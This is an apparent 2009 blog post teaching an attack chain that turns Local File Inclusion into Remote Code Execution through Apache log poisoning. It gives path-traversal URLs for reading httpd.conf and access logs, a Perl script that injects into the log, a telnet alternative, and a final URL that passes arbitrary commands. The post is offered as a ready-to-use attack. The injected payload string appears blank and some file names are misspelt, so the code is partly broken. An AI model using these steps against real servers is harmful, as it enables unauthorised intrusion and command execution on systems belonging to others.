Thursday, September 3, 2009

LFI & RCE

12:46 AM  matthews  

- LFI (Local File Inclusion)
- RCE (Remote Code Execution)

Start !!!

First we must found patch from httpd.conf in apache usually in:

/etc/httpd/conf/httpd.conf

so the exploit form LFI like this :

http://www.example.com/index.php?file=../../../../../../../../../etc/httpd/conf/httpd.conf

now we try to found access.log/access_log in httpd.conf, but remember the name of ServerAlias/web

example :


ServerAdmin webmaster@example1.com
DocumentRoot /home/matthews/httpdocs
ServerName example1.com
ServerAlias www.example1.com
ErrorLog /home/matthews/logs/error.log
CustomLog /home/matthews/logs/access.log common



ServerAdmin webmaster@example2.com
DocumentRoot /home/ander/httpdocs
ServerName example2.com
ServerAlias www.example2.com
ErrorLog /home/ander/logs/error.log
CustomLog /home/ander/logs/access.log common


Exploit:

http://www.example.com/index.php?file=../../../../../../../../../home/matthews/logs/access.log

or

http://www.example.com/index.php?file=../../../../../../../../../home/ander/logs/access.log


and then , you can save this perl script:

#==========================================================================================

use IO::Socket::INET;

my $host = $ARGV[0];
print "\n [*] Injecting Apache Access Log ...\n";
$sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 80, Proto => "tcp") || die " [!] Can't connect to $host:80!\n";
my $matthews = "";
print $sock "GET /matthews.m0de.0n ".$matthews." HTTP/1.1\r\n";
print $sock "Host: ".$host."\r\n";
print $sock "Connection: close\r\n\r\n";
close($sock);

print " [*] Done ...\n";

#==========================================================================================


and then save to your PC (matthews.txt)

open cmd and write :

perl natthews.txt www.example1.com <----- kalo yang mau di inject /home/matthews/logs/access.log
perl matthews.txt www.example2.com <----- kalo yang mau di inject /home/ander/logs/access.log


example

C:\xpl>perl matthews.txt www.example2.com

[*] Injecting Apache Access Log ...
[*] Done ...

if you don't have perl in your computer, you can use manually:

write in console:

telnet www.example1.com 80
GET /matthewa.m0de.0n HTTP/1.1

next

if you inject www.example2.com, then access.log that we open.

http://www.example.com/index.php?file=../../../../../../../../../home/ander/logs/access.log


wait untill loading finish..... and try to find string "matthews.m0de.0n"
if it works, like this :

"GET /matthews.m0de.0n
Warning: system() [function.system]: Cannot execute a blank command in /home/ander/logs/access.log on line 709

look this string "Cannot execute a blank command" <----- make sure they can RCE :D
for RCE exploit , like this:

http://www.example.com/index.php?file=../../../../../../../../../home/ander/logs/access.log&matthews=[CMD]

finish


my blog : http://matthews-diablo.blogspot.com

thank's for c0li.m0de.0n

Posted in:
Twitter Delicious Facebook Digg Stumbleupon Favorites More